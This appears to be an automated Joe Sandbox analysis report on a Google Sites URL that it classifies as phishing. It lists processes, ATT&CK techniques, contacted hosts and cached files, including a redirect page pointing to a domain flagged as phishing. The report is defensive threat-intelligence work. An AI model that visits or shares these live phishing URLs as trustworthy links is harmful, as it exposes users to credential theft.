          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49807 version: TLS 1.2
          Source: classification engineClassification label: mal64.phis.win@18/66@22/11
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2200,i,17206734623280546298,7125097228973372212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sites.google.com/ceqy.com/rfp/home"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2200,i,17206734623280546298,7125097228973372212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://sites.google.com/ceqy.com/rfp/home0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://j9.valcondunar.com/favicon.ico100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          j9.valcondunar.com
          104.21.68.132
          truefalse
            unknown
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              plus.l.google.com
              172.217.17.46
              truefalse
                high
                play.google.com
                172.217.19.206
                truefalse
                  high
                  code.jquery.com
                  151.101.130.137
                  truefalse
                    high
                    www.google.com
                    216.58.208.228
                    truefalse
                      high
                      googlehosted.l.googleusercontent.com
                      142.250.181.65
                      truefalse
                        high
                        blogger.googleusercontent.com
                        unknown
                        unknownfalse
                          high
                          apis.google.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://j9.valcondunar.com/favicon.icofalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://play.google.com/log?format=json&hasfast=true&authuser=0false
                                high
                                https://a.nel.cloudflare.com/report/v4?s=pNAxRHPRSwS1sTmOzA%2BuWArALfgGUee2J8LPho5vr3zWIMz39yr6Gssyy5bXrfbm%2BnFk8chGXBg4QnzklHZKhwZtCmIbAdgsiozEqExLJaLqG02fH4w5PSIy3Y4a2w%3D%3Dfalse
                                  high
                                  https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.pngfalse
                                    high
                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.6zM9SN8ON8Q.O/m=client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo9LiInNUyZ6A99oK9HdmPXGee7Zyg/cb=gapi.loaded_0?le=scsfalse
                                      high
                                      https://j9.valcondunar.com/b3k54/false
                                        unknown
                                        https://www.google.com/url?q=https%3A%2F%2Fj9.valcondunar.com%2Fb3k54%2F&sa=D&sntz=1&usg=AOvVaw0HL9wZZbhgOP55-NM_TPJgfalse
                                          high
                                          https://apis.google.com/js/client.js?onload=gapiLoadedfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://developers.google.com/identity/gsi/web/guides/gis-migration)chromecache_103.1.drfalse
                                              high
                                              https://scriptz.corp.google.com/chromecache_79.1.dr, chromecache_95.1.drfalse
                                                high
                                                https://apis.google.com/js/client.jschromecache_93.1.drfalse
                                                  high
                                                  https://classroom.google.com/sharewidget?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                    high
                                                    https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.htmlchromecache_103.1.drfalse
                                                      high
                                                      https://workspace.google.com/products/sites/chromecache_79.1.dr, chromecache_95.1.drfalse
                                                        high
                                                        https://console.developers.google.com/chromecache_105.1.dr, chromecache_103.1.drfalse
                                                          high
                                                          https://www.youtube.com/subscribe_embed?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                            high
                                                            https://dataconnector.corp.google.com/:session_prefix:ui/widgetview?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                              high
                                                              https://angular.dev/licensechromecache_79.1.dr, chromecache_95.1.drfalse
                                                                high
                                                                https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1chromecache_105.1.dr, chromecache_110.1.dr, chromecache_103.1.dr, chromecache_93.1.drfalse
                                                                  high
                                                                  https://plus.google.comchromecache_103.1.dr, chromecache_93.1.drfalse
                                                                    high
                                                                    https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=chromecache_79.1.dr, chromecache_95.1.drfalse
                                                                      high
                                                                      https://clients3.google.com/cast/chromecast/home/widget/backdrop?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                                        high
                                                                        https://support.google.com/a/answer/10411339chromecache_96.1.drfalse
                                                                          high
                                                                          https://www.google.com/shopping/customerreviews/badge?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                                            high
                                                                            https://one.google.com/storagechromecache_111.1.dr, chromecache_96.1.drfalse
                                                                              high
                                                                              https://play.google.com/log?format=json&hasfast=truechromecache_95.1.drfalse
                                                                                high
                                                                                https://pay.google.com/gp/v/widget/savechromecache_93.1.drfalse
                                                                                  high
                                                                                  https://drive.google.com/savetodrivebutton?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                                                    high
                                                                                    https://reportingwidget.corp.google.com/u/0/widget/chromecache_87.1.dr, chromecache_114.1.drfalse
                                                                                      high
                                                                                      https://talkgadget.google.com/:session_prefix:talkgadget/_/widgetchromecache_110.1.dr, chromecache_93.1.drfalse
                                                                                        high
                                                                                        https://one.google.com/planschromecache_111.1.dr, chromecache_96.1.drfalse
                                                                                          high
                                                                                          https://play.google.com/work/embedded/search?usegapi=1&usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                                                            high
                                                                                            https://one.google.com/storage/managementchromecache_111.1.dr, chromecache_96.1.drfalse
                                                                                              high
                                                                                              https://www.google.com/shopping/customerreviews/optin?usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                                                                high
                                                                                                https://developers.google.com/api-client-library/javascript/reference/referencedocschromecache_105.1.dr, chromecache_103.1.drfalse
                                                                                                  high
                                                                                                  https://rapid.corp.google.com/chromecache_79.1.dr, chromecache_95.1.drfalse
                                                                                                    high
                                                                                                    https://apis.google.comchromecache_93.1.drfalse
                                                                                                      high
                                                                                                      https://reportingwidget-staging.corp.google.com/u/0/widget/chromecache_87.1.dr, chromecache_114.1.drfalse
                                                                                                        high
                                                                                                        https://developers.google.com/chromecache_105.1.dr, chromecache_103.1.drfalse
                                                                                                          high
                                                                                                          https://families.google.com/webcreation?usegapi=1&usegapi=1chromecache_110.1.dr, chromecache_93.1.drfalse
                                                                                                            high
                                                                                                            https://fonts.google.com/license/googlerestrictedchromecache_107.1.drfalse
                                                                                                              high
                                                                                                              https://domains.google.com/suggest/flowchromecache_105.1.dr, chromecache_103.1.drfalse
                                                                                                                high
                                                                                                                https://support.google.com/cloudsearch/answer/6172299chromecache_111.1.dr, chromecache_96.1.drfalse
                                                                                                                  high
                                                                                                                  https://clients6.google.comchromecache_103.1.dr, chromecache_93.1.drfalse
                                                                                                                    high
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    172.217.19.206
                                                                                                                    play.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    172.217.19.238
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    104.21.68.132
                                                                                                                    j9.valcondunar.comUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    151.101.130.137
                                                                                                                    code.jquery.comUnited States
                                                                                                                    54113FASTLYUSfalse
                                                                                                                    239.255.255.250
                                                                                                                    unknownReserved
                                                                                                                    unknownunknownfalse
                                                                                                                    216.58.208.228
                                                                                                                    www.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    151.101.66.137
                                                                                                                    unknownUnited States
                                                                                                                    54113FASTLYUSfalse
                                                                                                                    142.250.181.78
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    35.190.80.1
                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    142.250.181.65
                                                                                                                    googlehosted.l.googleusercontent.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    IP
                                                                                                                    192.168.2.4
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1562628
                                                                                                                    Start date and time:2024-11-25 19:51:16 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 2m 54s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                                    Sample URL:https://sites.google.com/ceqy.com/rfp/home
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal64.phis.win@18/66@22/11
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 64.233.165.84, 142.250.181.14, 34.104.35.123, 172.217.19.170, 172.217.21.35, 142.250.181.106, 172.217.19.202, 216.58.208.234, 172.217.17.42, 142.250.181.138, 142.250.181.42, 172.217.17.74, 142.250.181.74, 172.217.19.234, 172.217.17.35, 199.232.210.172, 192.229.221.95, 172.217.19.195, 172.217.21.42
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • VT rate limit hit for: https://sites.google.com/ceqy.com/rfp/home
                                                                                                                    No simulations
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (367)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):839
                                                                                                                    Entropy (8bit):5.399389531785466
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:kbh6df+y4GN37Ye5ul1y0yLb3W5RNuCrx:wY4GNKI5vm5RNuCrx
                                                                                                                    MD5:3CCD19743C7E2513A6C4FA4A0FA30196
                                                                                                                    SHA1:8E6E9A716C1D42CBCFDE2BE8A635E3EBA478298E
                                                                                                                    SHA-256:8E383F9DCFCBA5DCFA4B0A8058278B3458A772F7C5A8EA16BF85542D496883B8
                                                                                                                    SHA-512:D9202B44847D79A25C32D70906145824A56EB49A3FA64B0EC19936A75CB23E3109D192C1715F1B6D200DCB86A4BD771E74F000FE90F076E1F8DFCEF15ABB27B9
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{.var FIb,EIb,HIb;FIb=function(a){return(a=EIb.exec(a))&&a[1]?a[1]:""};_.GIb=function(a){var c=FIb(a);return a.substring(c.length)};_.IIb=function(){HIb===void 0&&(HIb=FIb(location.pathname));return HIb};EIb=RegExp("^(/prod|/corp|/scary)?/");HIb=void 0;.}catch(e){_._DumpException(e)}.try{._.x("TRvtze");.var J3=function(a){_.Ll.call(this);this.B=a.Ba.configuration;this.C=_.qs()};_.F(J3,_.Mn);J3.la=function(){return{Ba:{configuration:_.jo},service:{flags:_.hu}}};J3.prototype.F=function(){return _.IIb()};J3.prototype.D=function(){return _.ss(this.C,"atari-rhpp")?_.vs(this.C,"atari-rhpp"):_.oj(this.B.get(),213)?"/_":_.IIb()+"/u/"+this.B.Tg().mk()+"/_"};_.ko(_.dHa,J3);._.z();.}catch(e){_._DumpException(e)}.}).call(this,this.default_vw);.// Google Inc..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (367)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):839
                                                                                                                    Entropy (8bit):5.399389531785466
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:kbh6df+y4GN37Ye5ul1y0yLb3W5RNuCrx:wY4GNKI5vm5RNuCrx
                                                                                                                    MD5:3CCD19743C7E2513A6C4FA4A0FA30196
                                                                                                                    SHA1:8E6E9A716C1D42CBCFDE2BE8A635E3EBA478298E
                                                                                                                    SHA-256:8E383F9DCFCBA5DCFA4B0A8058278B3458A772F7C5A8EA16BF85542D496883B8
                                                                                                                    SHA-512:D9202B44847D79A25C32D70906145824A56EB49A3FA64B0EC19936A75CB23E3109D192C1715F1B6D200DCB86A4BD771E74F000FE90F076E1F8DFCEF15ABB27B9
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=sy3h,TRvtze"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{.var FIb,EIb,HIb;FIb=function(a){return(a=EIb.exec(a))&&a[1]?a[1]:""};_.GIb=function(a){var c=FIb(a);return a.substring(c.length)};_.IIb=function(){HIb===void 0&&(HIb=FIb(location.pathname));return HIb};EIb=RegExp("^(/prod|/corp|/scary)?/");HIb=void 0;.}catch(e){_._DumpException(e)}.try{._.x("TRvtze");.var J3=function(a){_.Ll.call(this);this.B=a.Ba.configuration;this.C=_.qs()};_.F(J3,_.Mn);J3.la=function(){return{Ba:{configuration:_.jo},service:{flags:_.hu}}};J3.prototype.F=function(){return _.IIb()};J3.prototype.D=function(){return _.ss(this.C,"atari-rhpp")?_.vs(this.C,"atari-rhpp"):_.oj(this.B.get(),213)?"/_":_.IIb()+"/u/"+this.B.Tg().mk()+"/_"};_.ko(_.dHa,J3);._.z();.}catch(e){_._DumpException(e)}.}).call(this,this.default_vw);.// Google Inc..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23580, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):23580
                                                                                                                    Entropy (8bit):7.990537110832721
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:384:dRkIAJ8pVwWTW5VVjdVn8+2yvAMdriCEOY0kfW9GkAPqpPHi2vUuUSzB8:dKIAJ8pVHTZ+riY9oCpPHiodUeK
                                                                                                                    MD5:E1B3B5908C9CF23DFB2B9C52B9A023AB
                                                                                                                    SHA1:FCD4136085F2A03481D9958CC6793A5ED98E714C
                                                                                                                    SHA-256:918B7DC3E2E2D015C16CE08B57BCB64D2253BAFC1707658F361E72865498E537
                                                                                                                    SHA-512:B2DA7EF768385707AFED62CA1F178EFC6AA14519762E3F270129B3AFEE4D3782CB991E6FA66B3B08A2F81FF7CABA0B4C34C726D952198B2AC4A784B36EB2A828
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2
                                                                                                                    Preview:wOF2......\........,..[...........................z.p.`..D....e........]..B..6.$..v. .....E.K...5c[R..V.Vr!.....$....@n..P.....'%.1....."A...#H:.T.6.JL.7.g..7..x....N"..,h....R3..u.T..A.._O..f=Mu.e.....0.c.0.FV.q....m;8..J.t.-.%."....*..&..2...!\....n..]Lx..:......S/F.V.rf%..#.Uk}....X.1n..V.|.O..aC ."...#..>..n.... $;.....y.5..|>...;@..Q.D........FT...r=p.Llf...J.3..{Z.. t]Rp.N..Z..7"B..,D.0s..."o..V<...#.N.WZ...m.\......Pb....#:z...B......~w.....J.ABQ.u<.8j..m..r2.....Aq.fNY...P..c.L+......v.n..yV.w......l......H...,..2.."v.......R.V.[...s......@..L....CS..'....Z.2..o......).4.H{C.%..?.%^...#.A.]..[....._&.[~1..j.P..`.......=......[.D7h..5...s......d'.....,....?...6.;....f..(M.CV.....R..q.c.....4.6.k.V.h/..........H..?u..!mq5...9@..0YA9.M..:..reS.;._......K...\..S.^.2..Fv.l~'l..U.TN*....OXv..]..`.X1w.4E.t%a...2!.c.R.............t.'Hc...2.8...K.w..p@..T*..RZ.@..)}..*'+.7s1..... . -.....E7<...C.J.D....Iw-...u...m.K.\e..>..*....7y|{........G..d13g].t.%.y<..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1302)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):321092
                                                                                                                    Entropy (8bit):5.518874938435031
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:8gyimPi/iqshKsJqrpqIGAy8GpKH8FrsnPxCxPyBmsH:TyfP4iTEqI7yDpy6QZ
                                                                                                                    MD5:CAEA2AB2DF1C0F6D8966A61A38C15891
                                                                                                                    SHA1:8B455319D3647CEEAEB5F9B08E051C7FA498121E
                                                                                                                    SHA-256:0F0BA04C61AF50FC026908C7024D0B963F375B8B652A48A27E2833EDDA1BCB7A
                                                                                                                    SHA-512:2E9B3BDB91F7023978C3A30A7226377781AB0C407C05B2394BD492C095283C915A5F696A2BD330491BAA79CEABF968ACD3FDCA69B0D33BA7FBD7E6C9FD4FBCBC
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x200000, ]);.var aa,ba,fa,ma,na,ra,sa,ua;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.fa=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ka=fa(this);ma=function(a,b){if(b)a:{var c=_.ka;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)r
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):3298
                                                                                                                    Entropy (8bit):5.3256378013757315
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:HYgEatJc+u7YgEafNKYgpaiKJc+u7YgpaigNKOEa2pJc+u7OEaPNKOpaWJc+u7Ov:4OF3OBrii3riMM1C2MS
                                                                                                                    MD5:0BEE65EDF784600B19B417B62EAAB03A
                                                                                                                    SHA1:4652FCCF9BB4CA93CC03443B5044D395ABC0C011
                                                                                                                    SHA-256:638E0A9696A1287622B2881FCE4AA2450101D9F7E29CB7811FB4C737A4E7E8E0
                                                                                                                    SHA-512:AAA66F45FA0425D12E689ECA46AE3C5BA70294FBCEAE8354474D01A7F845B7B30C836F50DB6FB7A0D5B0DD2E16065AE815521FD99BB2CB67EF82835C9CCCC938
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.googleapis.com/css?family=Lato%3Ai%2Cbi%2C700%2C400&display=swap
                                                                                                                    Preview:/* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHj
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1302)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):321092
                                                                                                                    Entropy (8bit):5.518874938435031
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:8gyimPi/iqshKsJqrpqIGAy8GpKH8FrsnPxCxPyBmsH:TyfP4iTEqI7yDpy6QZ
                                                                                                                    MD5:CAEA2AB2DF1C0F6D8966A61A38C15891
                                                                                                                    SHA1:8B455319D3647CEEAEB5F9B08E051C7FA498121E
                                                                                                                    SHA-256:0F0BA04C61AF50FC026908C7024D0B963F375B8B652A48A27E2833EDDA1BCB7A
                                                                                                                    SHA-512:2E9B3BDB91F7023978C3A30A7226377781AB0C407C05B2394BD492C095283C915A5F696A2BD330491BAA79CEABF968ACD3FDCA69B0D33BA7FBD7E6C9FD4FBCBC
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.6zM9SN8ON8Q.O/m=client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo9LiInNUyZ6A99oK9HdmPXGee7Zyg/cb=gapi.loaded_0?le=scs
                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x200000, ]);.var aa,ba,fa,ma,na,ra,sa,ua;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.fa=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ka=fa(this);ma=function(a,b){if(b)a:{var c=_.ka;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)r
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):355
                                                                                                                    Entropy (8bit):5.421699944804181
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:wBzkrQWR0iYBtqW3kUWPq2JlKIOynEJOTnZqk7uR+nEJOTnZwY71QrizYynEJOTO:4krY1trWPqfni0/iHQrp7io
                                                                                                                    MD5:EFFCE19928AFE1F3FA08D12B478F3303
                                                                                                                    SHA1:A70C7D0F760798BD7ABEF806FCBC4AA422902000
                                                                                                                    SHA-256:FB9A55BF2CCD33FBE3053C660A942C4C1D6CFDDBB830B58AA13099B7DC07A499
                                                                                                                    SHA-512:7B9C3F303684646F40698641FC44667604C5A116F3ED8C3653E22C0F0BED907D583F40461FF27DDDF32B3BE8596C6A95149845ADE1F9B019D2DE35A5CC19BC26
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://www.google.com/url?q=https%3A%2F%2Fj9.valcondunar.com%2Fb3k54%2F&sa=D&sntz=1&usg=AOvVaw0HL9wZZbhgOP55-NM_TPJg
                                                                                                                    Preview:<HTML><HEAD>.<meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>Redirecting</TITLE>.<META HTTP-EQUIV="refresh" content="1; url=https://j9.valcondunar.com/b3k54/">.</HEAD>.<BODY onLoad="location.replace('https://j9.valcondunar.com/b3k54/'+document.location.hash)">.Redirecting you to https://j9.valcondunar.com/b3k54/</BODY></HTML>..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1572)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):36285
                                                                                                                    Entropy (8bit):5.564483010813965
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:UVF0ejKvKZ7EAN31uaDfxfOZvkwuwb0Ezz+:UVWeV
